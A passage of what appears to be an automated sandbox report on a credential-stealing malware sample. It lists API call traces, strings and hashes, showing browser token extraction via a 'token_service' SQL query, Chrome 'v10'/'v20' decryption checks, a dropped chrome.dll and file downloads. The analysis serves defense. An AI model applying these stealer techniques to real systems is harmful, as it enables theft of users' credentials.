                                              • Part of subcall function 02454A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                              • Part of subcall function 02454A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                            • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 024563C6
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 024563FE
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02456446
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0245646A
                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 02456493
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 024564C1
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 02456500
                                            • InternetCloseHandle.WININET(?), ref: 0245650A
                                            • InternetCloseHandle.WININET(00000000), ref: 02456517
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4287319946-0
                                            • Opcode ID: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                            • Instruction ID: a1a32b8b75431e687ebd2886bb4ca9faeaff4ca489103ba2a0a183ed80a40263
                                            • Opcode Fuzzy Hash: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                            • Instruction Fuzzy Hash: F05194B1A00228ABDB24DF50DC48BEE777AAB44305F40819AEA45A71C1DB74AA85CF95
                                            Function 02465227 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0246523E
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02465267
                                            • lstrcat.KERNEL32(?,00420FE8), ref: 02465284
                                              • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464DE3
                                              • Part of subcall function 02464DC7: FindFirstFileA.KERNEL32(?,?), ref: 02464DFA
                                            • memset.MSVCRT ref: 024652CA
                                            • lstrcat.KERNEL32(?,00000000), ref: 024652F3
                                            • lstrcat.KERNEL32(?,00421008), ref: 02465310
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02464E28
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02464E3E
                                              • Part of subcall function 02464DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02465034
                                              • Part of subcall function 02464DC7: FindClose.KERNEL32(000000FF), ref: 02465049
                                            • memset.MSVCRT ref: 02465356
                                            • lstrcat.KERNEL32(?,00000000), ref: 0246537F
                                            • lstrcat.KERNEL32(?,00421020), ref: 0246539C
                                              • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464E67
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,004208D3), ref: 02464E7C
                                              • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464E99
                                              • Part of subcall function 02464DC7: PathMatchSpecA.SHLWAPI(?,?), ref: 02464ED5
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,006D6F24), ref: 02464F01
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,00420FE0), ref: 02464F13
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,?), ref: 02464F27
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,00420FE4), ref: 02464F39
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,?), ref: 02464F4D
                                              • Part of subcall function 02464DC7: CopyFileA.KERNEL32(?,?,00000001), ref: 02464F63
                                              • Part of subcall function 02464DC7: DeleteFileA.KERNEL32(?), ref: 02464FE8
                                            • memset.MSVCRT ref: 024653E2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID:
                                            • API String ID: 4017274736-0
                                            • Opcode ID: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                            • Instruction ID: 3c48aa4299c34c1f581d441ce1c16f59e960e22a47112ce06fe257f661251870
                                            • Opcode Fuzzy Hash: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                            • Instruction Fuzzy Hash: E241D6B5E4032467DB10F770EC4AFE93339AB20701F80459AB689A50D0EEB857C88F92
                                            Function 024CF595 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 024CF6B4
                                            • ___TypeMatch.LIBVCRUNTIME ref: 024CF7C2
                                            • CatchIt.LIBVCRUNTIME ref: 024CF813
                                            • CallUnexpected.LIBVCRUNTIME ref: 024CF92F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2356445960-393685449
                                            • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                            • Instruction ID: 0a3ad24520043bd67bd27aa7ad12673e129742742aebbb593f9c5a110f15b558
                                            • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                            • Instruction Fuzzy Hash: A0B17E39800209AFCF54DFA9C840AAEB7B7BF04314B36415FE8156BA15D339D95ACFA1
                                            Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                            • memset.MSVCRT ref: 004173EA
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                            Strings
                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                            • API String ID: 224852652-4138519520
                                            • Opcode ID: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                            • Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
                                            • Opcode Fuzzy Hash: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                            • Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59
                                            Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                            • API String ID: 1440504306-1079375795
                                            • Opcode ID: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
                                            • Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
                                            • Opcode Fuzzy Hash: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
                                            • Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A
                                            Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                            • GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0040A0BE
                                            • GetProcAddress.KERNEL32(00000000,free_result), ref: 0040A0D5
                                            • FreeLibrary.KERNEL32(00000000,?,004108E4), ref: 0040A0F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryProc$FreeLoad
                                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                            • API String ID: 2256533930-1545816527
                                            • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
                                            • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B
                                            Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess$DefaultLangUser
                                            • String ID: *
                                            • API String ID: 1494266314-163128923
                                            • Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                            • Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
                                            • Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                            • Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52
                                            Function 02457897 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 02457597: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02457601
                                              • Part of subcall function 02457597: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02457678
                                              • Part of subcall function 02457597: StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 024576D4
                                              • Part of subcall function 02457597: GetProcessHeap.KERNEL32(00000000,?), ref: 02457719
                                              • Part of subcall function 02457597: HeapFree.KERNEL32(00000000), ref: 02457720
                                            • lstrcat.KERNEL32(006D7068,0042192C), ref: 024578CD
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 0245790F
                                            • lstrcat.KERNEL32(006D7068,00421930), ref: 02457921
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 02457956
                                            • lstrcat.KERNEL32(006D7068,00421934), ref: 02457967
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 0245799A
                                            • lstrcat.KERNEL32(006D7068,00421938), ref: 024579B4
                                            • task.LIBCPMTD ref: 024579C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                            • String ID:
                                            • API String ID: 2677904052-0
                                            • Opcode ID: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                            • Instruction ID: 68ed931e60f8551c68cf7679120c45843e776b8f353ebe23642e9dfe52aab708
                                            • Opcode Fuzzy Hash: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                            • Instruction Fuzzy Hash: CF3163B1D04128DFDB04EBE1DC94DFFB776AB44301F10411AE546672A1EA359A85CFA2
                                            Function 02455267 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02455281
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02455288
                                            • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 024552A1
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 024552C8
                                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 024552F8
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 02455341
                                            • InternetCloseHandle.WININET(?), ref: 02455370
                                            • InternetCloseHandle.WININET(?), ref: 0245537D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                            • String ID:
                                            • API String ID: 1008454911-0
                                            • Opcode ID: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                            • Instruction ID: bce85e96753a770d83cd74b0597c78c2b1b47f78c09abcff68b72705440f00a5
                                            • Opcode Fuzzy Hash: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                            • Instruction Fuzzy Hash: 7731FFB4E45228EBDB20CF54DC85BDCB7B5AB48304F5081D9FA09A7281D7706AC5CF59
                                            Function 024659C7 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246AD97: lstrlen.KERNEL32(024551BC,?,?,024551BC,00420DDF), ref: 0246ADA2
                                              • Part of subcall function 0246AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0246ADFC
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • StrCmpCA.SHLWAPI(00000000,004210B0,00000000), ref: 02465AFB
                                            • StrCmpCA.SHLWAPI(00000000,004210B8), ref: 02465B58
                                            • StrCmpCA.SHLWAPI(00000000,004210C8), ref: 02465D0E
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 024656A7: StrCmpCA.SHLWAPI(00000000,00421074), ref: 024656DF
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02465777: StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 024657CF
                                              • Part of subcall function 02465777: lstrlen.KERNEL32(00000000), ref: 024657E6
                                              • Part of subcall function 02465777: StrStrA.SHLWAPI(00000000,00000000), ref: 0246581B
                                              • Part of subcall function 02465777: lstrlen.KERNEL32(00000000), ref: 0246583A
                                              • Part of subcall function 02465777: strtok.MSVCRT(00000000,?), ref: 02465855
                                              • Part of subcall function 02465777: lstrlen.KERNEL32(00000000), ref: 02465865
                                            • StrCmpCA.SHLWAPI(00000000,004210C0,00000000), ref: 02465C42
                                            • StrCmpCA.SHLWAPI(00000000,004210D0,00000000), ref: 02465DF7
                                            • StrCmpCA.SHLWAPI(00000000,004210D8), ref: 02465EC3
                                            • Sleep.KERNEL32(0000EA60), ref: 02465ED2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID:
                                            • API String ID: 3630751533-0
                                            • Opcode ID: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                            • Instruction ID: 2135515e168e4900332f5d9dc8e40abb90087404b56bde9c1635dcf8a41b19dc
                                            • Opcode Fuzzy Hash: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                            • Instruction Fuzzy Hash: 1FE11E71900614ABCB18FBA5EC99EFD733BAF54300F80856EE54666190EF359E08CF92
                                            Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                              • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                            • StrCmpCA.SHLWAPI(00000000,009C9630), ref: 00410922
                                            • StrCmpCA.SHLWAPI(00000000,009C96B0), ref: 00410B79
                                            • StrCmpCA.SHLWAPI(00000000,009C9600), ref: 00410A0C
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                            Strings
                                            • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                            • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                            • API String ID: 585553867-663540502
                                            • Opcode ID: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
                                            • Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
                                            • Opcode Fuzzy Hash: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
                                            • Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A
                                            Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                            • memset.MSVCRT ref: 0040A60B
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcmp$AllocLocallstrcpymemset
                                            • String ID: @$v10$v20
                                            • API String ID: 631489823-278772428
                                            • Opcode ID: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                            • Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
                                            • Opcode Fuzzy Hash: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                            • Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A
                                            Function 02451577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0245158E
                                              • Part of subcall function 02451507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0245151B
                                              • Part of subcall function 02451507: RtlAllocateHeap.NTDLL(00000000), ref: 02451522
                                              • Part of subcall function 02451507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0245153E
                                              • Part of subcall function 02451507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0245155C
                                              • Part of subcall function 02451507: RegCloseKey.ADVAPI32(?), ref: 02451566
                                            • lstrcat.KERNEL32(?,00000000), ref: 024515B6
                                            • lstrlen.KERNEL32(?), ref: 024515C3
                                            • lstrcat.KERNEL32(?,00426414), ref: 024515DE
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 024516CC
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 0245A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0245A3A3
                                              • Part of subcall function 0245A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0245A3C8
                                              • Part of subcall function 0245A377: LocalAlloc.KERNEL32(00000040,?), ref: 0245A3E8
                                              • Part of subcall function 0245A377: ReadFile.KERNEL32(000000FF,?,00000000,024516F6,00000000), ref: 0245A411
                                              • Part of subcall function 0245A377: LocalFree.KERNEL32(024516F6), ref: 0245A447
                                              • Part of subcall function 0245A377: CloseHandle.KERNEL32(000000FF), ref: 0245A451
                                            • DeleteFileA.KERNEL32(00000000), ref: 02451756
                                            • memset.MSVCRT ref: 0245177D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID:
                                            • API String ID: 3885987321-0
                                            • Opcode ID: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
